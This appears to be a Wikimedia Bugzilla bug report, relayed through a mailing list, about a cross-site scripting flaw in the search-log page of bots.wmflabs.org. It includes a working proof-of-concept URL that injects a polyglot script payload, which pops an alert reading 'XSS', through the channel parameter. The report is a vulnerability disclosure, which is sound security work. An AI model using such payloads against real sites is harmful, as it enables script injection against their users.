https://bugzilla.wikimedia.org/show_bug.cgi?id=44618
Web browser: --- Bug ID: 44618 Summary: http://bots.wmflabs.org cross site scripting Product: Wikimedia Labs Version: unspecified Hardware: PC OS: Windows XP Status: UNCONFIRMED Severity: normal Priority: Unprioritized Component: bots Assignee: benap...@gmail.com Reporter: insecurity...@gmail.com CC: wikibugs-l@lists.wikimedia.org Classification: Unclassified Mobile Platform: --- Created attachment 11720 --> https://bugzilla.wikimedia.org/attachment.cgi?id=11720&action=edit xss xss in url. test on mozilla firefox browser. http://bots.wmflabs.org/~wm-bot/searchlog/index.php?action=search&channel=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%23%23thinewiki -- You are receiving this mail because: You are on the CC list for the bug. You are watching all bug changes. _______________________________________________ Wikibugs-l mailing list Wikibugs-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikibugs-l